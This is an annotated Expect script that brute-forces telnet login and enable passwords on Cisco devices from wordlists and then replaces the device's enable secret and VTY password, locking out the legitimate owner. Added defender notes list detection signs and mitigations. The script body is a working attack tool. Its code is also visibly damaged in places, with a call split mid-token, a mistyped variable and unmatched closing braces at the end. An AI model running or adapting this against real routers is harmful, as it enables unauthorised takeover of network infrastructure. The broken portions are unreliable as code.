#####################################################
# Expect Brute Force Password                       #
# for cisco with password authentication            #
#                                                   #
# Written by Mr.Parinya Jutasen                     #
#                                                   #
#####################################################
#!/usr/bin/expect -f
#
# Summary of what this listing does:
#   1. Prompts the operator for two new values, a VTY line password and a
#      privileged (enable) password.
#   2. Reads whitespace-separated candidates from password.txt and opens one
#      telnet session per candidate to the host given as the first argument.
#   3. At a ">" prompt it sends "enable" and walks enable.txt the same way.
#   4. At a "#" prompt it rewrites the enable secret, the enable password and
#      the password on "line vty 0 4" to the values from step 1.
#
# Defender notes:
#   - Everything travels over telnet, so the candidates and the replacement
#     passwords cross the network in clear text.
#   - On the device side this shows up as many short telnet sessions from one
#     source, each with a failed login, followed by a configuration change
#     that contains "no enable secret".
#   - It only works where VTY lines accept telnet with a shared line password.
#     Restricting VTY to SSH ("transport input ssh"), per-user AAA logins,
#     "login block-for" rate limiting, an "access-class" ACL on the VTY lines
#     and logging of failed logins each remove or expose that precondition.
#   - NOTE(review): the listing looks damaged by extraction. One call is split
#     across two lines and the closing braces near the end have no visible
#     opener. Code tokens are reproduced as found.

############ Declaration ######################
# Seconds each expect waits before giving up on a pattern.
set timeout 10
# Target host is the first command-line argument.
set server [lindex $argv 0]
#set hosts [open $host_list r]
#set dictionary [lindex $argv 0]
# Candidate login passwords. No close of this handle is visible in the listing.
set tryPass [open password.txt r]
#set enable ksc
# stty -echo is commented out, so the two values typed below are echoed on
# the operator's terminal.
#stty -echo
send_user "New VTY Password:"
expect_user -re "(.*)\n"
send_user "\n"
set password(vty) $expect_out(1,string)
send_user "New Priviledge Password:"
expect_user -re "(.*)\n"
send_user "\n"
set password(pri) $expect_out(1,string)

################## Server List ###########################
#proc server_list {} {
#puts "$server"
#return $server
#}

################## Telnet #######################
# Spawns a telnet client to host. No call to this proc is visible in the
# listing; the main loop spawns telnet directly.
proc telnetkrub {host} {
  spawn telnet $host
  return
}

########## Operation ############################
# Runs once a privileged "#" prompt has been reached.
#   pri  - value written as both enable secret and enable password
#   vty  - value written as the password on line vty 0 4
#   host - host to reconnect to after the change
# Each step waits for "#" before sending the next command. Writing the same
# value as "enable password" leaves it in the configuration in the weaker
# enable-password form next to the hashed secret.
proc operation {pri vty host} {
  send "Hello $pri $vty\r"
  expect "#" { send "conf term\r"}
  expect "#" { send "no enable secret\r"}
  expect "#" { send "enable secret $pri\r"}
  expect "#" { send "enable password $pri\r"}
  expect "#" { send "line vty 0 4 \r"}
  expect "#" { send "password $vty\r"}
  expect "#" { send "exit\r"}
  expect "#" { send "exit\r"}
  # After the last exit, open a fresh telnet session and hand it to the
  # operator with interact.
  expect "#" { send "exit\r";expect; spawn telnet $host;interact}
  return
}

################ # Check Status ########################
# Tries enable.txt candidates against the enable prompt.
#   g c t - passed straight through to operation as pri, vty and host
# The literal word "null" in the file acts as an end-of-list marker.
# Each candidate is also printed to stdout by puts. The enable.txt handle is
# not closed in the visible code.
proc expect_check_enable {g c t} {
  set dic [open enable.txt r]
  foreach passwds [split [read $dic] ] {
    if {$passwds=="null"} {
      send_user "End list Pass Goodbye\n"
      break
    }
    expect {
      "Password:" {send "$passwds\n";puts "passwds:$pass wds" }
      "#" {break}
      ">" {send "enable\r"}
    }
  }
  send "\r"
  # On a "#" prompt, run operation and terminate the whole script.
  expect "#" {puts [operation $g $c $t];exit}
  return
}

################# Check Status ########################
# Drives one telnet session with a single candidate login password.
#   password - candidate sent at each "Password:" prompt
#   p v s    - forwarded to expect_check_enable
# Loops until the output contains "Bad" (presumably the device's
# bad-password message; confirm against the target's banner text).
# The candidate is printed to stdout on every attempt.
# NOTE(review): the call in the ">" branch is split across two lines in the
# source listing and is kept that way here.
proc expect_check { password p v s} {
  while {1} {
    expect {
      Password: { send "$password\r";puts " password_check: $password"}
      ">" { send "enable\r";puts [expec
t_check_enable $p $v $s]}
      Bad {break}
    }
  }
  return
}

############### Main ###################################
#foreach server [split [read $hosts] ] {
# if {$server=="null"} {
# send_user "End list Goodbye\n"
# exit
# }
# One telnet session per candidate from password.txt. The word "null" ends
# the list. After each attempt the spawned telnet process is sent SIGINT.
foreach passwd [split [read $tryPass] ] {
  spawn telnet $server
  if {$passwd=="null"} {
    send_user "End list Pass Goodbye\n"
    break
  }
  puts [expect_check $passwd $password(pri) $password(vty) $server ]
  expect
  set id [exp_pid]
  exec kill -INT $id
}
# NOTE(review): the statements and closing braces below have no matching
# opener in the visible listing. They may be leftovers of the commented-out
# server loop above. Reproduced as found.
spawn telnet $server
expect_user -re "(*.)\n"
}
set id [exp_pid]
exec kill -INT $id
}
#########################################################